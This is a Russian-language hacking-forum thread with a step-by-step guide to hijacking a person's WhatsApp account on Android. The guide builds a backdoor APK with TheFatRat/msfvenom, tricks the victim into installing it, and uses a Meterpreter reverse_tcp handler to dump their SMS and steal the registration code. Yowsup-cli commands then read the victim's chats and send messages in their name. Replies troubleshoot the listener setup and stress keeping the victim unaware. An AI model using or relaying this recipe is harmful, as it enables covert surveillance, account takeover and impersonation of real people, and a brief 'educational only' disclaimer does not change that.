HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 13.08.2017, 19:07
Vertigo
Познавший АНТИЧАТ
Регистрация: 27.02.2017
Сообщений: 1,312
С нами: 4845950

Репутация: 0


По умолчанию

Добрый день,Уважаемые Форумчане и Друзья.
Сегодня мы разберём с вами один из интересных способов атаки на пользователей Whatsapp.

В итоге,мы должны будем получить полный контроль над аккаунтом,просматривать сообщения,разговоры в текстовом формате.
И,на мой взгляд,самое страшное-способность отсылать сообщения от имени скомпрометированного абонента на другие контакты.

Для этого нам понадобиться знать 3 вещи: номер телефона,наличие у абонента Android и то,что он пользуется приложением Whatsapp.
Нам также будут необходимы инструменты Metasploit,TheFatRat,RemoteWA,yowsup.

Информация предназначена исключительно для ознакомления и изучения проблем безопасности.

Категорически запрещено использование упоминаемых инструментов в незаконных целях.

В случае неправомерных действий,администрация ресурса,авторы инструментов и обзора ответственности не несут.Соблюдайте разумность и этику.


Итак,погнали.У нас имеются следующие исходные данные:
а) Наш Ip-адрес роутера,он же шлюз (192.168.0.1 или 192.168.1.1)
б) Наш публичный IP-адрес (внешний)
В) MCC — код страны - это берём из википедии https://en.wikipedia.org/wiki/mobile_country_code
г) MNC — код сети (Числовой код,соотв-щий оператору сотовой сети,берём также из Вики по справочнику)
д) СС - телефонный код страны (а не то,что некоторые подумали))
В маршрутизаторе открываем для tcp-соединения порт 2020,которое будет перенаправляться на наши IP как внутренний, так и внешний.
Теперь,надо создать исполняемый файл с расширением .apk,который будет здесь/TheFatRat/output/papados.apk (к примеру)

Запускаем программу TheFatRat и выбираем 1 (создать Backdoor с msfvenom)
Далее,указываем пункт 3 (Android fatrat.apk)

IP-адрес тестируемого Amdroid, нам знать необязательно при этом.
Грузим наш файл на ресурс,позволяющий загрузить файл для свободного доступа.
Например,который приводит автор : http://ge.tt/

Это неважно,т.к. смысл в том,чтобы тестируемый абонент скачал и сохранил этот файл себе (придётся проявить способности СИ)
На данном этапе,у нас появляется доступ к мобильному устройству.

Стартуем Metasploit и закатываем use exploit / multi / handler
И указываем нагрузку : set loadload android / meterpreter / reverse_tcp

Указываем LHOST c LPORT 2020,даём команду exploit.
В этом случае,мы получаем сессию Meterpreter (если тестируемый абонент скачал себе наш вредонос)

Мы сейчас здесь не за этим конечно, и у нас уже установленa yowsup

Это библиотека python, которая позволяет нам создавать приложение, использующее службу WhatsApp.

Yowsup также используется для создания неофициального клиента WhatsApp

По идее,пакет устанавливает RemotеWA,но на всякий случай.

Уствновка:


Код:


Код:
# git clone https://github.com/tgalal/yowsup.git
# cd yowsup
# chmod +x setup.py
# sudo pip install yowsup2
# sudo python setup.py install
И установим самое главное:

Код:


Код:
# git clone https://github.com/MundoHackers/RemoteWA.git
# cd RemoteWA/
# sudo ./RemoteWA.sh
# Дважды подтверждаем (Y)
Интерфейс на первом скрине
Да,если начнёте пробовать этот инструмент,то поймёте,как автор немного перестарался,в нём есть практически всё для этой атаки.
Автоматизация всего описанного процесса,так сказать,присутствует.

водим команду:

Код:


Код:
# yowsup-cli registration --requestcode sms --phone телефон --cc телеф.код страны --mnc код фирмы,предоставляющей услуги
Этим мы добиваемся того,что whatsapp отправляет sms абоненту с кодом для входа для этого приложения.
Помним,что у нас есть открытая сессия в meterpreter, и у есть возможность просмотреть полученные sms и удалить их.

Таким образом,мы также говорим Whatsapp,что используем другое устройство (наш терминал конечно же)
На этом этапе генерируется код регистрации:
meterpreter> dump sms
Создаём файл, из которого мы можем визуализировать содержимое:
SMS messages dump

Теперь,делаем такой запрос,запустив второй терминал,и нам Whatsapp высылает пароль:

Код:


Код:
# sudo yowsup-cli registration --register код полученный  --phone телефон --cc телеф.код страны
Ищем строку pw и видим пароль.

Создадим файл с именем whatsapp_config.txt
Так становятся доступны переговоры тестируемого абонента с третьими лицами
При этом ,мы можем видеть не только слова,но и номера тех,кто говорит с тестируемым.

Код:


Код:
# sudo yowsup-cli demos --config whatsapp_config.txt --echo
А вот таким образом,мы можем от имени тестируемого отправлять сообщения,указав другой номер телефона:

Код:


Код:
# yowsup-master/sudo yowsup-cli demos --config whatsapp_config.txt --send номер телефона"сообщение"
Для себя отметил 2 сложности такого метода:
1) Файл должен попасть на Android тестируемого.
2) Тестируемый должен быть после в полном неведении (ведь ему будут приходить сообщения,которые надо будет убрать)

Но ,тем не менее,метод имеет право на существование.
Согласитесь,что если ещё и иметь физический доступ к устройству тестируемого...некрасивень о, однако , для него получается.)

На этом ,у меня всё,подробности и ответы на вопросы можно посмотреть здесь (всё же,справедливо будет дать ссылку на автора метода)
http://www.mundohackers.es/

Спасибо всем за внимание и до новых встреч.
 
Ответить с цитированием

  #2  
Старый 13.08.2017, 19:40
Vertigo
Познавший АНТИЧАТ
Регистрация: 27.02.2017
Сообщений: 1,312
С нами: 4845950

Репутация: 0


По умолчанию

Цитата:

DusikOff сказал(а):

ОФФТОП

ТС, на машине тайловый WM? Если да, то какой? Я никак не выберу на что можно перейти
Archstrike с накатанным сверху инструментарием Blackarch , репами , блекменом и усилена пакетом python-anaconda.
 
Ответить с цитированием

  #3  
Старый 13.08.2017, 21:57
Vertigo
Познавший АНТИЧАТ
Регистрация: 27.02.2017
Сообщений: 1,312
С нами: 4845950

Репутация: 0


По умолчанию

Цитата:

DusikOff сказал(а):

и насколько шустрая такая связка? Работаете с USB или в VM?

Да,пока VM и в мечтах только прикупить свободный ноут и попробовать установить это всё дело на него.
Связка мне понравилась,хотя много головной боли было с допиливаем (ну не без этого)
Вариация devel позволяет всегда получать в первых рядах новую версию ядра.
Скорость работы нормальная,но конечно из-за Гномовского окружения (всё же привык к нему)может быть и выше.
Плюс ,объём установленных пакетов достаточно весомый.Справляется)
 
Ответить с цитированием

  #4  
Старый 14.08.2017, 14:15
Merkif
Новичок
Регистрация: 18.01.2017
Сообщений: 0
С нами: 4903413

Репутация: 0
По умолчанию

Может кому понадобиться, Проверка номера HLR-запросом. Можно узнать (mcc: mnc: imsi:msc
https://smsc.ru/testhlr/
 
Ответить с цитированием

  #5  
Старый 19.08.2017, 01:38
FlowLight
Новичок
Регистрация: 18.08.2017
Сообщений: 0
С нами: 4598927

Репутация: 0
По умолчанию

Отстой

Необоснованная оценка. 72 часа на обдумывание. Администратор.
 
Ответить с цитированием

  #6  
Старый 25.08.2017, 02:54
Vertigo
Познавший АНТИЧАТ
Регистрация: 27.02.2017
Сообщений: 1,312
С нами: 4845950

Репутация: 0


По умолчанию

Цитата:

aza_fan сказал(а):

Это вы имели ввиду что смс к нему тоже будут приходить на телефон или то, что пользователи которым мы от его имени отправляем сообщения???

Когда проделывается фокус с паролем и факт подтверждения использования другого устройства,то служба приложения вышлет сообщение на Android.
[doublepost=1503615272,1503614046][/doublepost]

Цитата:

ytreq сказал(а):

в итоге метод для контроля близких людей, так как нужен физический доступ к аппарату.
Или через близких контролить и провоцировать не близких)

Не совсем так. С физическим доступом всё понятно.А для реализации удалённой атаки ,придётся проявить нехилые методы СИ.
Если читать колонку автора метода,то он не просто шутит о том,что такие атаки проводят в тёмное время суток.
Суть в том ,что вредонос должен попасть на тестируемое устройство,владелец которого скачивает его по ссылке.
Сложность именно в этом временном интервале,когда злоумышленник дожидается ночи.
Ведь обратная сессия не прилетает без причины и катализатора.
Вот в это время и происходит всё.
Т.е.,расчёт на то,что при скачивании у владельца устройства не должно возникнуть подозрений,что в прилагаемом файле содержится что-то ещё.Устройство не защищено ( Сам редко вижу Андроиды с установленными AV).
 
Ответить с цитированием

  #7  
Старый 26.08.2017, 23:02
Vertigo
Познавший АНТИЧАТ
Регистрация: 27.02.2017
Сообщений: 1,312
С нами: 4845950

Репутация: 0


По умолчанию

Цитата:

aza_fan сказал(а):

не совсем работает! А именно подключаешься к инету расшаренном через телефон.... ip допустим узнал через команду ifconfig. Далее пытаешься получить сессию с мобильника. Соединение ПЫТАЕТСЯ установиться, но никак не проходит и в конце ошибка. Команды выполняю через ноут который получает шаренный инет именно с того android который раздает инет

Ребята,значит что-то делаем не так.Всё должно работать. Атака относится к разряду средней сложности (не высший пилотаж).
Проверяем открытый порт (делаем проброс при необходимости).Никаких ip тестируемого человека нам не требуется.Всё есть в описании,не поленитесь посетить колонку автора,скрины подробнее,чем само описание.
 
Ответить с цитированием

  #8  
Старый 29.08.2017, 20:31
ghostphisher
Новичок
Регистрация: 07.12.2016
Сообщений: 0
С нами: 4963406

Репутация: 0
По умолчанию

Цитата:

aza_fan сказал(а):

Просто когда это пытался делать тот ip на который в вышепрведенном руководстве указан, телефон не мог соединиться. То есть 192.168.43.1 у меня. Это роутер мобильника,

есть вероятность, что именно в этом вся проблема. Попробуйте просканировать порты, быть может роутер не пускает траффик на них. Тоесть порт открывается а связи с ним нет. Аналогия проброса портов. И потом, в фатрате надо писать адрес куда соеденятся - тоесть IP листенера, а это явно не 43.1. Надо указать LHOST (ip системы на которой запущен метасплоит)
 
Ответить с цитированием

  #9  
Старый 29.08.2017, 23:34
ghostphisher
Новичок
Регистрация: 07.12.2016
Сообщений: 0
С нами: 4963406

Репутация: 0
По умолчанию

Цитата:

aza_fan сказал(а):

вот тут бы подробней:
то есть вот есть у меня ip системы - допустим какой нибудь там 192.168...., но что значит IP листенера??? Как это узнать???

См внимательнее - листенер это порт, программа которая ожидает соеденения. Сеть обычно выглядит так:
192.168.0.1 <- роутер <----192.168.0.10 комп с пэррот или кали 192.168.0.11 жертва. Мы создаем файл, который должен нам дать доступ к 192.168.0.11 , работаем мы с 192.168.0.10, значит мы на 10 поднимаем то, что будет принимать нам связь при запуске нашего приложения на 11 машине.

Одним словом, на той системе, на которой настраивается ожидание соеденение (в метасплоит к примеру) мы и пишем этот IP в LHOST
 
Ответить с цитированием

  #10  
Старый 08.09.2017, 12:11
Bunder99
Новичок
Регистрация: 07.09.2017
Сообщений: 0
С нами: 4569495

Репутация: 0
По умолчанию

Цитата:

sergunz сказал(а):

Все таки, я что то неправильно делаю, или сейчас разрабочики WhatsApp что то пофиксили? Я прохожу ргистрацию через yowsup-cli, могу отправлять сообщения от абнента, но при этом у самого абонента на телефоне перестает работать клиент WhatsApp, предлагает пройти повторную регистрацию. Пройдя повторную регистрацию на телефоне, перестает работать yowsup-cli..

Аналогичная ситуация. У кого не вылетает мобильный клиент, вы регались с опцией "-Е android" или "-E s40"?

А еще у меня не грузится история после регистрации в yowsup-cli, хотя сообщения отправляются без ошибок. Может это как раз из-за того, что с телефона WhatsApp слетел? кто сталкивался?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.